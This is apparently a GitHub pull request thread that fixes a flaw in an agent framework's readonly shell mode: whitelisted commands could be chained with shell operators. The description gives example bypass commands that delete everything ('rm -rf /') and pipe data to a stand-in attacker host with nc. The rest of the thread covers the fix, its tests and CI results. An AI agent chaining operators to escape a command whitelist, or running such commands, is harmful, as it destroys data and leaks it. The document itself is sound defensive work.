fix: block shell operators in readonly/allowed-command mode

[Ricardo-M-L]

Why Are These Changes Needed?

LocalShellEnvironment(readonly=True) restricts execution to a whitelist of read-only commands. However, since commands run with shell=True, an agent can bypass this restriction via shell operators:

env = LocalShellEnvironment(readonly=True)

env.run("echo hello")           # ✓ allowed (read-only)
env.run("echo pwned > file.txt") # ✓ ALSO allowed — creates a file!
env.run("cat x && rm -rf /")    # ✓ ALSO allowed — destructive!
env.run("ls | nc attacker 1234") # ✓ ALSO allowed — exfiltrates data!

The matches() function only validates the command prefix ("echo", "cat", "ls") but doesn't detect shell operators (>, |, &&, ;) that follow.

Changes

1. base.py: Add contains_shell_operator() that detects >, >>, |, ;, &&, ||, and backticks
2. local.py: When an allowed-command whitelist is active, reject commands containing shell operators

After the fix:

env.run("echo hello")            # ✓ still allowed
env.run("echo pwned > file.txt") # ✗ rejected: shell operators not permitted

Related issue number

N/A (discovered during code review)

Checks

• I've included any doc changes needed
• I've made sure all auto checks have passed

Verification

Test coverage (test/beta/tools/test_local_shell.py):

• test_allowed_permits_matching_command — allowed command without operators executes (touch <path>, file is created)
• test_allowed_blocks_shell_redirect_bypass — echo hello > <path> is rejected even when echo is whitelisted
• test_allowed_blocks_non_matching_command — non-whitelisted command stays blocked

CI status at head 12f42beff1: 23 / 23 passing (was failing before the test-assertion fix in this commit — the previous test asserted "hello" in str(reply) but reply was the TestConfig final_reply and never contained tool stdout).

[marklysze]

@Ricardo-M-L thanks for identifying and working on this. Would you be able to check the failing tests?

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.

Files with missing lines	Coverage Δ
autogen/beta/tools/shell/environment/base.py	85.71% <100.00%> (+1.09%)	⬆️
autogen/beta/tools/shell/environment/local.py	98.24% <100.00%> (+0.09%)	⬆️

... and 116 files with indirect coverage changes

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[Ricardo-M-L]

@marklysze The failing tests are fixed in 12f42be. Root cause was that the assertion \"hello\" in str(reply) could never pass — reply is the TestConfig final_reply=\"done\" and never contains the tool's stdout, so the test always failed regardless of whether echo hello ran. Replaced with a touch-based test (allowed=[\"touch\"], run touch <path>, assert output.exists()) that mirrors the sibling test_allowed_blocks_non_matching_command pattern (same fixture, opposite expectation).

CI is now green across all 23 checks. Ready for another look when you have a moment 🙏